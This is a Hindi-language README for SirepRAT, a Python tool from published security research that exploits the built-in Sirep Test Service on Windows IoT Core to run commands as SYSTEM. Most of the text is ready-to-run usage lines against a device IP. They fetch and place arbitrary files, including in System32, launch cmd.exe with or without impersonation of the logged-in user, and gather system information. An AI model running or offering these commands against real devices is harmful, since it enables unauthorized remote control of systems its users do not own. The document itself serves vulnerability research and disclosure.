
Windows IoT Core पर SYSTEM के रूप में रिमोट कमांड निष्पादन (Python2.7 और Python3 के लिए रिलीज़ उपलब्ध)

SirepRAT में लक्ष्य पर वास्तविक RAT मैलवेयर लिखे बिना पूर्ण RAT क्षमताएँ हैं।
यह विधि Sirep Test Service का शोषण करती है जो Microsoft की साइट पर उपलब्ध आधिकारिक इमेज में बिल्ट-इन और चल रही है। यह सेवा HLK सेटअप का क्लाइंट भाग है जिसे IoT डिवाइस पर ड्राइवर/हार्डवेयर परीक्षण करने के लिए बनाया जा सकता है। यह Sirep/WPCon/TShell प्रोटोकॉल प्रदान करती है।
हमने Sirep/WPCon प्रोटोकॉल को तोड़ा और प्रदर्शित किया कि कैसे यह प्रोटोकॉल हमलावरों के लिए एक दूरस्थ कमांड इंटरफ़ेस उजागर करता है, जिसमें RAT क्षमताएँ जैसे मनमाने फ़ाइलों को मनमाने स्थानों पर प्राप्त/रखना और सिस्टम जानकारी प्राप्त करना शामिल है।
सेवा और प्रोटोकॉल के बारे में इस शोध से प्राप्त निष्कर्षों के आधार पर, हमने एक सरल पायथन टूल बनाया जो विभिन्न समर्थित कमांड का उपयोग करके उनका शोषण करने की अनुमति देता है। हमने इसे SirepRAT नाम दिया।
इसमें Windows IoT Core लक्ष्य पर कमांड भेजने के लिए एक आसान और सहज उपयोगकर्ता इंटरफ़ेस है। यह किसी भी केबल-कनेक्टेड डिवाइस पर काम करता है जो आधिकारिक Microsoft इमेज के साथ Windows IoT Core चला रहा है।
स्लाइड्स और शोध व्हाइट पेपर docs फ़ोल्डर में हैं
pip install -r requirements.txt
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
तर्कों के साथ, वर्तमान में लॉग इन उपयोगकर्ता के रूप में प्रतिरूपित:
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
(SYSTEM निष्पादन क्षमता प्रदर्शित करने के लिए as_logged_on_user फ़्लैग के बिना इसे चलाने का प्रयास करें)
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"
python SirepRAT.py --help
Dor Azouri (@bemikre)
movatica (@movatica) - Python 3 में पोर्टिंग! (2020 की समाप्ति रेखा पर)
BSD 3 - "New" या "Revised" लाइसेंस क्लॉज़